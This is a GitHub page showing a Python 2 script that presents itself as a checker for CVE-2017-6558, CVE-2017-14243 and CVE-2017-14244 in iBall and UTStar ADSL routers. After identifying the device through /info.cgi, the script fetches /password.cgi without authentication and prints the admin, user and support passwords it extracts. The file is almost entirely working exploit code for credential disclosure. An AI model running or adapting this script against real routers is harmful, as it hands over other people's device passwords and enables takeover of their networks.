-
Notifications
You must be signed in to change notification settings - Fork 2
/
iball-utstar.py
68 lines (61 loc) · 2.59 KB
/
iball-utstar.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
#/bin/python
# -*- coding: utf-8 -*-
import sys
import os
import urllib2
import argparse
import re
from termcolor import colored
def get_response(url):
response = urllib2.urlopen(url)
return response.read()
def get_info(url):
res = get_response(url + '/info.cgi')
if "iB-WRA150N" in res:
print colored('[INF]','green'), 'Device identified: iBall 150M Wireless-N ADSL2+ Router (iB-WRA150N)'
print colored('[RES]', 'red'), 'Vulnerable to CVE-2017-6558'
print colored('[RES]', 'red'), 'Firmware Version: ' + find_between(res, '<td>', '</td>')
get_cred(url)
else:
if "ADSL2+" in res:
print colored('[INF]','green'), 'Device identified: iBall ADSL2+ Home Router WRA150N'
print colored('[RES]','red'), 'Vulnerable to CVE-2017-14244'
print colored('[RES]','red'),'Firmware Version: FW' + find_between(res, 'FW', '</td>')
else:
if "96338W" in res:
print colored('[INF]','green'), 'Device identified: UTStar WA3002G4 ADSL Broadband Modem'
print colored('[RES]','red'), 'Vulnerable to CVE-2017-14243'
get_cred(url)
else:
print colored('[INF]','green'), 'Device not vulnerable to CVE-2017-6558, CVE-2017-14243 or CVE-2017-14244'
print colored('\r\nCompleted!\r\n','green'),
def get_cred(url):
res = get_response(url + '/password.cgi')
matches = re.findall("(?<=\s').*?(?=')", res, re.DOTALL)
print '\nUsernames\tPasswords\n', colored('---------\t----------', 'green')
print 'admin\t\t' + matches[0] + '\nuser\t\t' + matches[1] + '\nsupport\t\t' + matches[2]
def find_between( s, first, last ):
try:
start = s.index( first ) + len( first )
end = s.index( last, start )
return s[start:end]
except ValueError:
return ""
def display_info():
print colored('\r\n¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦','green')
print colored('¦','green'), ' Check for CVE-2017-6558, CVE-2017-14243 & CVE-2017-14244 ', colored('¦','green')
print colored('¦','green'), ' Created by: Gem George ' , colored('¦','green')
print colored('¦','green'), ' Website: https://www.techipick.com/ ', colored('¦','green')
print colored('¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦','green')
print "\r\n"
print colored('[SET]','blue'), 'Target URL: ', sys.argv[1]
def main():
if len(sys.argv) != 2:
print 'Wrong argument count\nEg: ' + os.path.basename(__file__) + ' http://192.168.1.1'
exit()
else:
display_info()
url = sys.argv[1].rstrip('/')
get_info(url)
if __name__ == "__main__":
main()